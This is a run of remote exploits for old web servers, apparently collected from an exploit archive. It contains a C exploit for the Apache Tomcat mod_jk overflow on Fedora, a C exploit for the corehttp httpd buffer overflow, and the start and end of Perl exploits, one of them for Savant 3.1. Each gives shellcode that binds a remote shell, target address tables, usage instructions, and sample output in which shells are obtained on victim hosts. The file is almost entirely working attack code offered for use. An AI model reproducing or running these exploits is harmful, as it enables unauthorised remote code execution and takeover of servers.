"\x70\x43\x32\x55\x45\x6f\x43\x6c\x49\x68\x61\x36\x 32\x51\x52\x36".
"\x32\x62\x62\x52\x72\x50\x6a\x66\x70\x5a\x6d\x4f\x 70\x4f\x69\x6f".
"\x63\x50\x51\x32\x73\x73\x62\x50\x6a\x72\x48\x36\x 38\x38\x4d\x4f".
"\x70\x4c\x70\x51\x7a\x68\x4d\x6f\x70\x62\x72\x62\x 73\x50\x52\x58".
"\x30\x65\x4e\x5a\x6d\x4d\x50\x6c\x57\x32\x4a\x66\x 62\x31\x49\x41".
"\x7a\x41\x4a\x52\x78\x46\x31\x30\x57\x32\x71\x4a\x 6d\x4d\x50\x77".
"\x39\x51\x69\x6c\x35\x30\x50\x32\x48\x66\x4f\x56\x 4f\x32\x53\x62".
"\x48\x52\x48\x76\x4f\x70\x62\x32\x49\x50\x6e\x4d\x 59\x5a\x43\x52".
"\x70\x72\x74\x56\x33\x70\x53\x6e\x50\x47\x4b\x38\x 4d\x6b\x30\x42".
"A" x 100;
$alignment = 4127;
$|=1;
if ($target eq 1) {
$shellcode = $lnx_shellcode;
$addr = 0xbffff060;
}
if ($target eq 2) {
$shellcode = $lnx_shellcode;
$addr = 0xbfffef4c;
}
if ($target eq 3) {
$shellcode = $bsd_shellcode;
$addr = 0xbfbfe5d5;
}
$offset = pack('l', $addr);
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $port,
Proto => 'tcp');
$a = "A" x ($alignment-4-length($shellcode)) . $shellcode . $offset;
print $sock "GET /$a HTTP/1.0\r\n\r\n";
while(<$sock>) {
print;
}
# [2007-06-22]
80 Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
/*
**
** Fedora Core 5,6 (exec-shield) based
** Apache Tomcat Connector (mod_jk) remote overflow exploit
** by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** Reference: http://www.securityfocus.com/bid/22791
** vendor: http://tomcat.apache.org/
**
** eliteboy's exploit (SUSE, Debian, FreeBSD):
** http://www.enigmagroup.org/exploits/4093
**
** Nicob <nicob[at]nicob.net>'s exploit (Win32):
** http://downloads.securityfocus.com/vulnerabilities/exploits/apache_modjk_overflow.rb
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <[email protected]>.
** My World: http://x82.inetcop.org
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#ifdef __linux__
#include <getopt.h>
#endif
#define MAP_URI_TO_WORKER_1_FC5 0x080474bc /* (0x2040),(0x201c) */
#define MAP_URI_TO_WORKER_1_FC6 0x080476a4 /* (0x2040),(0x201c) */
#define MAP_URI_TO_WORKER_2 0x82828282
#define MAP_URI_TO_WORKER_3 0x08048014
/* parody */
#define HOST_PARAM "0x82-apache-mod_jk.c" /* Host */
#define DEFAULT_CMDZ "uname -a;id;echo 'hehe, its GOBBLES style!';export TERM=vt100;exec bash -i\n"
#define PADDING_1 'A'
#define PADDING_2 'B'
#define PADDING_3 'C'
#define RET_ADDR_INC (0x2000)
#define SH_PORT 8282
char library_shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
/* linux_ia32_bind - LPORT=8282 Size=108 Encoder=PexFnstenvSub http://metasploit.com */
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xe0"
"\x2c\x54\x7f\x83\xeb\xfc\xe2\xf4\xd1\xf7\x07\x3c\x b3\x46\x56\x15"
"\x86\x74\xcd\xf6\x01\xe1\xd4\xe9\xa3\x7e\x32\x17\x c0\x76\x32\x2c"
"\x69\xcd\x3e\x19\xb8\x7c\x05\x29\x69\xcd\x99\xff\x 50\x4a\x85\x9c"
"\x2d\xac\x06\x2d\xb6\x6f\xdd\x9e\x50\x4a\x99\xff\x 73\x46\x56\x26"
"\x50\x13\x99\xff\xa9\x55\xad\xcf\xeb\x7e\x3c\x50\x cf\x5f\x3c\x17"
"\xcf\x4e\x3d\x11\x69\xcf\x06\x2c\x69\xcd\x99\xff";
struct {
int num;
char *type;
int ret_count;
u_long retaddr;
u_long strcpy_plt;
int offset;
u_long pop_pop_pop_ret_code;
u_long pop_pop_ret_code;
u_long ret_code;
u_long worker_arg1;
} targets[] = {
{0,"Fedora Core release 5 (Bordeaux) - exec-shield\n"
"\tApache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n"
"\ttarball install: /usr/local/apache\n"
"\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz",
3,0x100104,0x08060c80,4112,0x08060dc4,0,0,MAP_URI_ TO_WORKER_1_FC5},
{1,"Fedora Core release 6 (Zod) - exec-shield\n"
"\tApache/2.0.49 (Unix) mod_jk/1.2.19\n"
"\ttarball install: /usr/local/apache\n"
"\tbinary install: mod_jk-apache-2.0.49-linux-i686.so",
27,0x100104,0x0805fe74,4124,0x08061489,0,0,MAP_URI _TO_WORKER_1_FC6},
{2,"Fedora Core release 6 (Zod) - exec-shield\n"
"\tApache/2.0.49 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n"
"\ttarball install: /usr/local/apache\n"
"\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz",
23,0x100104,0x0805fe74,4112,0x08061489,0,0,MAP_URI _TO_WORKER_1_FC6},
{3,"Fedora Core release 6 (Zod) - exec-shield\n"
"\tApache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n"
"\ttarball install: /usr/local/apache\n"
"\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz",
3,0x100104,0x08060164,4112,0x080614d4,0,0,MAP_URI_ TO_WORKER_1_FC6},
}, victim;
void re_connt(int sock);
void conn_shell(int sock,char *cmdz);
void usage(char *argv0);
void banrl();
int main(int argc,char *argv[]){
int sock;
int i=0,j=0,l=0,b=0;
unsigned char do_ex[8192];
unsigned char ex_buf[8192*2];
unsigned char sm_buf[4];
char *hostp=NULL,*portp=NULL,*cmdz=DEFAULT_CMDZ;
memset(&victim,0,sizeof(victim));
banrl();
while((i=getopt(argc,argv,"h:t:c:r:s:p:o:m:C:"))!=-1){
switch(i){
case 'h':
hostp=(char *)strtok(optarg,":");
if((portp=(char *)strtok(NULL,":"))==NULL)
portp="80";
break;
case 't':
if(atoi(optarg)>=sizeof(targets)/sizeof(victim)){
usage(argv[0]);
return -1;
}
memcpy(&victim,&targets[atoi(optarg)],sizeof(victim));
break;
case 'c':
victim.ret_count=atoi(optarg);
break;
case 'r':
victim.retaddr=strtoul(optarg,NULL,16);
break;
case 's':
victim.strcpy_plt=strtoul(optarg,NULL,16);
break;
case 'p':
victim.pop_pop_pop_ret_code=strtoul(optarg,NULL,16 );
break;
case 'o':
victim.offset=atoi(optarg);
break;
case 'm':
victim.worker_arg1=strtoul(optarg,NULL,16);
break;
case 'C':
cmdz=optarg;
break;
default:
usage(argv[0]);
break;
}
}
if(!victim.ret_count||!victim.retaddr||!victim.str cpy_plt||!victim.offset||!victim.pop_pop_pop_ret_c ode||!victim.worker_arg1||!hostp||!portp){
usage(argv[0]);
return -1;
}
victim.pop_pop_ret_code=victim.pop_pop_pop_ret_cod e+1;
victim.ret_code=victim.pop_pop_pop_ret_code+3;
printf(" os: %s\n\n",victim.type);
printf(" host: %s\n",hostp);
printf(" port: %s\n",portp);
printf(" count: %d\n",victim.ret_count);
printf(" strcpy@plt: %p\n",victim.strcpy_plt);
printf(" offset: %d\n",victim.offset);
printf(" pop_pop_pop_ret_code: %p\n",victim.pop_pop_pop_ret_code);
printf(" pop_pop_ret_code: %p\n",victim.pop_pop_ret_code);
printf(" ret_code: %p\n",victim.ret_code);
printf(" map_uri_to_worker() arg1: %p\n",victim.worker_arg1);
printf(" start retaddr: %p\n\n",victim.retaddr);
putchar(';');
srand(getpid());
for(b=0;;victim.retaddr+=RET_ADDR_INC){
putchar((rand()%2)? 'P':'p');
fflush(stdout);
usleep(100000);
memset((char *)do_ex,0,sizeof(do_ex));
memset((char *)ex_buf,0,sizeof(ex_buf));
memset((char *)sm_buf,0,sizeof(sm_buf));
#define __GOGOSSING(dest,index,src){\
*(long *)&dest[index]=src;\
index+=4;\
}
for(i=0;i<victim.offset-1;i++){
sprintf(do_ex+i,"%c",PADDING_1);
}
__GOGOSSING(do_ex,i,victim.pop_pop_pop_ret_code);
__GOGOSSING(do_ex,i,victim.worker_arg1); /* pop */
__GOGOSSING(do_ex,i,MAP_URI_TO_WORKER_2); /* pop */
__GOGOSSING(do_ex,i,MAP_URI_TO_WORKER_3); /* pop */
for(j=0;j<victim.ret_count;j++){
__GOGOSSING(do_ex,i,victim.ret_code);
}
__GOGOSSING(do_ex,i,victim.strcpy_plt); /* ret */
__GOGOSSING(do_ex,i,victim.ret_code);
__GOGOSSING(do_ex,i,victim.retaddr); /* library */
sprintf(ex_buf,"GET /");
l=strlen(ex_buf);
for(j=0;j<i;j++){
if((do_ex[j]>0x08)&&(do_ex[j]<0x0e)){
memset((char *)sm_buf,0,sizeof(sm_buf));
sprintf(sm_buf,"%02x",do_ex[j]);
ex_buf[l++]='%';
ex_buf[l++]=sm_buf[0];
ex_buf[l++]=sm_buf[1];
}
else ex_buf[l++]=do_ex[j];
}
l=strlen(ex_buf);
sprintf(ex_buf+l," HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\n\r\n",library_shellcode,HOST_PARAM);
sock=setsock(hostp,atoi(portp));
re_connt(sock);
send(sock,ex_buf,strlen(ex_buf),0);
close(sock);
sock=setsock(hostp,SH_PORT);
if(sock!=-1){
printf("\nTHIS IS KOREAAAAA~!: ret_count=%d, retaddr=%p, strcpy@plt=%p,\n"
"pop3/ret=%p, worker_arg1=%p\n\n",victim.ret_count,victim.retaddr,
victim.strcpy_plt,victim.pop_pop_pop_ret_code,vict im.worker_arg1);
conn_shell(sock,cmdz);
exit(-1);
}
}
}
int setsock(char *host,int port)
{
int sock;
struct hostent *he;
struct sockaddr_in x82_addr;
if((he=gethostbyname(host))==NULL)
{
return -1;
}
if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF)
{
return -1;
}
x82_addr.sin_family=AF_INET;
x82_addr.sin_port=htons(port);
x82_addr.sin_addr=*((struct in_addr *)he->h_addr);
bzero(&(x82_addr.sin_zero),8);
if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF)
{
return -1;
}
return(sock);
}
void re_connt(int sock)
{
if(sock==-1)
{
printf("\n[-] ");
fflush(stdout);
perror("connect()");
printf("[-] exploit failed.\n");
exit(-1);
}
}
void conn_shell(int sock,char *cmdz)
{
int pckt;
char rbuf[1024];
fd_set rset;
memset((char *)rbuf,0,1024);
send(sock,cmdz,strlen(cmdz),0);
while(1)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);
if(FD_ISSET(sock,&rset))
{
pckt=read(sock,rbuf,1024);
if(pckt<=0)
{
exit(0);
}
rbuf[pckt]=0;
printf("%s",rbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
pckt=read(STDIN_FILENO,rbuf,1024);
if(pckt>0)
{
rbuf[pckt]=0;
write(sock,rbuf,pckt);
}
}
}
return;
}
void usage(char *argv0){
int i;
printf("Usage: %s <-switches> -h host[:80]\n",argv0);
printf(" -h host[:port]\tHost\n");
printf(" -t number\t\tTarget id.\n");
printf(" -c ret_count\t\tret count\n");
printf(" -r retaddr\t\tstart library retaddr\n");
printf(" -s strcpy@plt\t\tstrcpy plt address\n");
printf(" -p pop3/ret\t\tpop3/ret address\n");
printf(" -o offset\t\tOffset\n");
printf(" -m worker_arg1\tmap_uri_to_worker() arg1\n");
printf(" -C cmdz\t\tCommands\n");
printf("\nExample: %s -t 0 -h apache_tomcat.target.kr\n",argv0);
printf("\n--- --- - Potential targets list - --- ---- ------- ------------\n");
printf(" ID / Return addr / Target specification\n");
for(i=0;i<sizeof(targets)/sizeof(victim);i++)
printf("% 3d / 0x%08x /\n\t%s\n\n",i,targets[i].retaddr,targets[i].type);
exit(-1);
}
void banrl(){
printf("INetCop(c) Security\t\t\t\t\t%s\n\n",HOST_PARAM);
}
/*
**
** Fedora core 5 exploit:
** --
** $ ./0x82-apache-mod_jk -t 0 -h fc5.inetcop.org
** INetCop(c) Security 0x82-apache-mod_jk.c
**
** os: Fedora Core release 5 (Bordeaux) - exec-shield
** Apache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20
** tarball install: /usr/local/apache
** tarball install: tomcat-connectors-1.2.xx-src.tar.gz
**
** host: fc5.inetcop.org
** port: 80
** count: 3
** strcpy@plt: 0x8060c80
** offset: 4112
** pop_pop_pop_ret_code: 0x8060dc4
** pop_pop_ret_code: 0x8060dc5
** ret_code: 0x8060dc7
** map_uri_to_worker() arg1: 0x80474bc
** start retaddr: 0x100104
**
** ;PPPpppPpppPpppPPpPpPPPppPppPPppPPpPPpPPPPPP
** THIS IS KOREAAAAA~!: ret_count=3, retaddr=0x154104, strcpy@plt=0x8060c80,
** pop3/ret=0x8060dc4, worker_arg1=0x80474bc
**
** Linux localhost 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
** uid=99(nobody) gid=4294967295 groups=4294967295
** hehe, its GOBBLES style!
** bash: no job control in this shell
** bash-3.1$
** --
**
** Fedora core 6 exploit:
** --
** $ ./0x82-apache-mod_jk -t 3 -h fc6.inetcop.org
** INetCop(c) Security 0x82-apache-mod_jk.c
**
** os: Fedora Core release 6 (Zod) - exec-shield
** Apache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20
** tarball install: /usr/local/apache
** tarball install: tomcat-connectors-1.2.xx-src.tar.gz
**
** host: fc6.inetcop.org
** port: 80
** count: 3
** strcpy@plt: 0x8060164
** offset: 4112
** pop_pop_pop_ret_code: 0x80614d4
** pop_pop_ret_code: 0x80614d5
** ret_code: 0x80614d7
** map_uri_to_worker() arg1: 0x80476a4
** start retaddr: 0x100104
**
** ;pPpPppppPpppPppPPPpPPpPppPpPpPPpPPPPPpP
** THIS IS KOREAAAAA~!: ret_count=3, retaddr=0x14c104, strcpy@plt=0x8060164,
** pop3/ret=0x80614d4, worker_arg1=0x80476a4
**
** Linux localhost 2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006 i686 i686 i386 GNU/Linux
** uid=99(nobody) gid=4294967295 groups=4294967295
** hehe, its GOBBLES style!
** bash: no job control in this shell
** bash-3.1$
** --
**
*/
/* eox */
// [2007-07-08]
80 corehttp 0.5.3alpha (httpd) Remote Buffer Overflow Exploit
/*[ corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. ]**********
* *
* by: vade79/v9 [email protected] (fakehalo/realhalo) *
* *
* compile: *
* gcc xcorehttp.c -o xcorehttp *
* *
* syntax: *
* ./xcorehttp [-r] -h host -p port *
* *
* corehttp homepage/url: *
* http://corehttp.sourceforge.net/ *
* *
* bug(http.c): *
* ----------------------------------------------------------------------- *
* struct sprock_t *HttpSprockMake(struct sprock_t *parentsprock) { *
* struct sprock_t *sprocket; *
* char req[PATHSIZE], url[PATHSIZE], status[PATHSIZE], temp[BUFSIZE], *
* ... *
* if ((sprocket = (struct sprock_t *) *
* malloc(sizeof(struct sprock_t))) == NULL) return NULL; *
* ... *
* sscanf(parentsprock->buffer, "%[A-Za-z] %s%*[ \t\n]", req, url); *
* !(the bug/overwrite) --------------------------------------^----^ *
* strncpy(sprocket->parent->url, url, PATHSIZE); *
* !(the problem) -^ *
* ... *
* for (i = 0; req[i] != '\0'; i++) *
* req[i] = toupper(req[i]); *
* !(another problem) -^ *
* ... *
* } *
* ----------------------------------------------------------------------- *
* *
* explaination: *
* the sscanf() call in the above code contains no bounds checks for *
* writing to either req[] or url[] (i chose url[] as it gave more room *
* to work with, by overwriting into req[], and isnt limited to *
* alphabetical characters only) *
* *
* the first problem is that this overflows into the *sprocket structure *
* pointer, which is used immediately after the overflow. this is *
* automatically calculated in this exploit, using the same location in *
* memory with an offset. (+512 to ret address, which points to the nops) *
* *
* the second problem is all lowercase characters get uppercased, this *
* will happen weither or not you overwrite via req[] or url[]. if the *
* return address contains a lowercase character it will uppercase it. *
* *
* this exploit has 256(%4) bytes of working room, so avoiding lowercase *
* characters should be doable. *
* *
* note: *
* there are two areas in the stack this will appear, the one closer *
* to the top of the stack should be used. *
* *
* example usage: *
* [v9@fhalo v9]$ gcc xcorehttp.c -o xcorehttp *
* [v9@fhalo v9]$ ./xcorehttp -h dual.fakehalo.lan -p 5555 *
* corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. *
* by: vade79/v9 [email protected] (fakehalo/realhalo) *
* *
* target : dual.fakehalo.lan:5555 *
* return address : 0xbfffea60 *
* *sprocket replacement : 0xbfffec60 *
* *
* attempting to connect: dual.fakehalo.lan:5555. *
* successfully connected: dual.fakehalo.lan:5555. *
* sending string: *
* [+] "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" *
* closing connection. *
* *
* attempting to connect: dual.fakehalo.lan:7979. *
* successfully connected: dual.fakehalo.lan:7979. *
* *
* Linux fhlnxd 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unkn$ *
* uid=501(v9) gid=501(v9) groups=501(v9) *
* *
* (...nothing like a overly complex exploit to quench my brain thirst. *
* although, i didn't do any support for randomized memory addresses, oh *
* well) *
************************************************** *************************/
#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <getopt.h>
#include <ctype.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFSIZE (2+512+16+256+4)
#define TIMEOUT 10
#define SPORT 7979
#define DFL_RETADDR 0xbfffea60
/* globals. */
/* linux_ia32_bind - LPORT=7979 Size=243 Encoder=PexAlphaNum */
/* http://metasploit.com */
/* filt: 0x00 0x0a 0x0d 0x2b 0x25 0x3f 0x20 0x2f 0x09 (0x61-0x7a) */
static char x86_bind[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x53\x 4b\x4d\x43\x35"
"\x43\x44\x43\x35\x4c\x56\x44\x50\x4c\x56\x48\x46\x 4a\x45\x49\x39"
"\x49\x48\x41\x4e\x4d\x4c\x42\x38\x48\x49\x43\x44\x 44\x35\x48\x36"
"\x4a\x56\x4f\x31\x4b\x52\x48\x46\x43\x45\x49\x48\x 41\x4e\x4c\x36"
"\x48\x56\x4a\x35\x42\x55\x41\x55\x48\x55\x49\x48\x 41\x4e\x4d\x4c"
"\x42\x48\x42\x4b\x48\x46\x41\x4d\x43\x4e\x4d\x4c\x 42\x38\x44\x55"
"\x44\x45\x48\x45\x43\x34\x49\x58\x41\x4e\x42\x4b\x 48\x56\x4d\x4c"
"\x42\x38\x43\x39\x4c\x36\x44\x30\x49\x55\x42\x4b\x 4f\x53\x4d\x4c"
"\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b\x4b\x30\x 44\x55\x4a\x56"
"\x4f\x32\x4f\x52\x43\x57\x4a\x46\x4a\x36\x4f\x42\x 44\x56\x49\x46"
"\x50\x46\x49\x48\x43\x4e\x44\x55\x43\x45\x49\x38\x 41\x4e\x4d\x4c"
"\x42\x58\x5a";
struct{
unsigned int addr;
char *host;
unsigned short port;
}tbl;
/* lonely extern. */
extern char *optarg;
/* functions. */
char *getbuf(unsigned int);
unsigned short corehttp_connect(char *,unsigned short);
signed int getshell_conn(char *,unsigned short);
void proc_shell(signed int);
void printe(char *,short);
void usage(char *);
void sig_alarm(){printe("alarm/timeout hit.",1);}
/* start. */
int main(int argc,char **argv){
signed int chr=0,rsock=0;
printf(" corehttp[v0.5.3alpha]: httpd remote buffer overflo"
"w exploit.\n by: vade79/v9 [email protected] (fakehalo/realhalo)"
"\n\n");
tbl.addr=DFL_RETADDR;
while((chr=getopt(argc,argv,"h:p:r:"))!=EOF){
switch(chr){
case 'h':
if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
printe("main(): allocating memory failed",1);
break;
case 'p':
tbl.port=atoi(optarg);
break;
case 'r':
sscanf(optarg,"%x",&tbl.addr);
break;
default:
usage(argv[0]);
break;
}
}
if(!tbl.host||!tbl.port)usage(argv[0]);
if(tbl.addr%4)printe("return address must be a multiple of 4.",1);
if((tbl.addr&0x000000ff)!=toupper((tbl.addr&0x000000ff)) ||
((tbl.addr&0x0000ff00)>>8)!=toupper(((tbl.addr&0x0000ff00)>>8)) ||
((tbl.addr&0x00ff0000)>>16)!=toupper(((tbl.addr&0x00ff0000)>>16)) ||
((tbl.addr&0xff000000)>>24)!=toupper(((tbl.addr&0xff000000)>>24)))
printe("return address contains a lowercase character.",1);
printf(" target\t\t\t: %s:%d\n",tbl.host,tbl.port);
printf(" return address\t\t: 0x%.8x\n",tbl.addr);
printf(" *sprocket replacement\t: 0x%.8x\n\n",(tbl.addr+512));
corehttp_connect(tbl.host,tbl.port);
rsock=getshell_conn(tbl.host,SPORT);
if(rsock>0)proc_shell(rsock);
exit(0);
}
/* make buf: */
/* "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" */
char *getbuf(unsigned int addr){
unsigned int i=0;
char *buf;
if(!(buf=(char *)malloc(BUFSIZE+1)))
printe("getbuf(): allocating memory failed.",1);
memset(buf,0,BUFSIZE);
/* needed to match the sscanf(); */
memcpy(buf,"X ",2);
/* make [NOPS+SHELLCODE], 512 bytes, overwrites url[256] AND req[256], */
/* right up until the 'struct sprock_t *sprocket' pointer */
memset(buf+2,'\x90',(513-sizeof(x86_bind)));
memcpy(buf+2+(513-sizeof(x86_bind)),x86_bind,strlen(x86_bind));
/* replaces the *sprocket pointer, really only needed at 524[4], the */
/* first ones are fillers. */
for(i=0;i<16;i+=4){
*(long *)&buf[2+512+i]=(addr+512);
}
/* the *sprocket pointer will now point to this, which goes to the */
/* shellcode. */
for(i=0;i<256;i+=4){
*(long *)&buf[2+512+16+i]=addr;
}
/* needed to be interpreted by corehttp. */
memcpy(buf+2+512+16+256,"\r\n\r\n",4);
/* send it on its way. */
return(buf);
}
/* connects to the vulnerable corehttp server. */
unsigned short corehttp_connect(char *hostname,unsigned short port){
signed int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf(" attempting to connect: %s:%d.\n",hostname,port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
printe("couldn't resolve hostname.",1);
memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("corehttp/httpd connection failed.",1);
alarm(0);
printf(" successfully connected: %s:%d.\n",hostname,port);
sleep(1);
printf(" sending string:\n");
printf("[+] \"X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\\r\\n"
"\\r\\n\"\n");
write(sock,getbuf(tbl.addr),BUFSIZE);
sleep(1);
printf(" closing connection.\n\n");
close(sock);
return(0);
}
/* connects to bindshell. */
signed int getshell_conn(char *hostname,unsigned short port){
signed int sock=0;
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))= =-1)
printe("getshell_conn(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
printe("getshell_conn(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
printf(" attempting to connect: %s:%d.\n",hostname,port);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",hostname,port);
exit(1);
}
alarm(0);
printf(" successfully connected: %s:%d.\n\n",hostname,port);
return(sock);
}
/* process the bindshell. */
void proc_shell(signed int sock){
signed int r=0;
char buf[4096+1];
fd_set fds;
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;id\n",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
/* error! */
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)exit(1);
return;
}
/* usage. */
void usage(char *progname){
printf("syntax: %s [-r] -h host -p port\n\n",progname);
printf(" -h <host/ip>\ttarget hostname/ip.\n");
printf(" -p <port>\ttarget port.\n");
printf(" -r <addr>\tdefine return address. (0x%.8x)\n\n",tbl.addr);
exit(0);
}
// [2007-07-29]
80 Savant 3.1 Get Request Remote Overflow Exploit (Universal)
#!/usr/bin/perl -w
# exploit for Savant webserver 3.1 remote bof
# shellcode bind 4444 port on target host
#
#
# Jacopo cervini aka [email protected]
#
use IO::Socket;
if(!($ARGV[1]))
{
print "Uso: savant-3.1.pl <victim> <port>\n\n";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "can't connect on $ARGV[0] sulla porta $ARGV[1]";
#Metasploit shellcode
$shellcode =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xb5".
"\x55\x45\xd4\x83\xeb\xfc\xe2\xf4\x49\x3f\xae\x99\x 5d\xac\xba\x2b".
"\x4a\x35\xce\xb8\x91\x71\xce\x91\x89\xde\x39\xd1\x cd\x54\xaa\x5f".
"\xfa\x4d\xce\x8b\x95\x54\xae\x9d\x3e\x61\xce\xd5\x 5b\x64\x85\x4d".
"\x19\xd1\x85\xa0\xb2\x94\x8f\xd9\xb4\x97\xae\x20\x 8e\x01\x61\xfc".
"\xc0\xb0\xce\x8b\x91\x54\xae\xb2\x3e\x59\x0e\x5f\x ea\x49\x44\x3f".
"\xb6\x79\xce\x5d\xd9\x71\x59\xb5\x76\x64\x9e\xb0\x 3e\x16\x75\x5f".
"\xf5\x59\xce\xa4\xa9\xf8\xce\x94\xbd\x0b\x2d\x5a\x fb\x5b\xa9\x84".
"\x4a\x83\x23\x87\xd3\x3d\x76\xe6\xdd\x22\x36\xe6\x ea\x01\xba\x04".
"\xdd\x9e\xa8\x28\x8e\x05\xba\x02\xea\xdc\xa0\xb2\x 34\xb8\x4d\xd6".
"\xe0\x3f\x47\x2b\x65\x3d\x9c\xdd\x40\xf8\x12\x2b\x 63\x06\x16\x87".
"\xe6\x06\x06\x87\xf6\x06\xba\x04\xd3\x3d\x54\x88\x d3\x06\xcc\x35".
"\x20\x3d\xe1\xce\xc5\x92\x12\x2b\x63\x3f\x55\x85\x e0\xaa\x95\xbc".
"\x11\xf8\x6b\x3d\xe2\xaa\x93\x87\xe0\xaa\x95\xbc\x 50\x1c\xc3\x9d".
"\xe2\xaa\x93\x84\xe1\x01\x10\x2b\x65\xc6\x2d\x33\x cc\x93\x3c\x83".
"\x4a\x83\x10\x2b\x65\x33\x2f\xb0\xd3\x3d\x26\xb9\x 3c\xb0\x2f\x84".
"\xec\x7c\x89\x5d\x52\x3f\x01\x5d\x57\x64\x85\x27\x 1f\xab\x07\xf9".
"\x4b\x17\x69\x47\x38\x2f\x7d\x7f\x1e\xfe\x2d\xa6\x 4b\xe6\x53\x2b".
"\xc0\x11\xba\x02\xee\x02\x17\x85\xe4\x04\x2f\xd5\x e4\x04\x10\x85".
"\x4a\x85\x2d\x79\x6c\x50\x8b\x87\x4a\x83\x2f\x2b\x 4a\x62\xba\x04".
"\x3e\x02\xb9\x57\x71\x31\xba\x02\xe7\xaa\x95\xbc\x 45\xdf\x41\x8b".
"\xe6\xaa\x93\x2b\x65\x55\x45\xd4";
$nop="\x90"x201;
$incbh="\xfe\xc7"x4; # inc bh opcode
$incebx="\x43"x23; # inc ebx opcode
$asm1 = "\x53\xc3"; # push ebx,ret opcode
$nop1="\x90"x19;
$asm = "\x83\xc4\x8c\x54\xc3"; # add esp,-74,pueh esp,ret for jump in $nop without a direct jmp because there are # some opcode not allowed and we have need of space for our shellcode
$nop2="\x90"x210;
$eip = "\x74\x86\x41"; # 0x00418674 memory address of pop eax, ret in Savant.exe it's universal
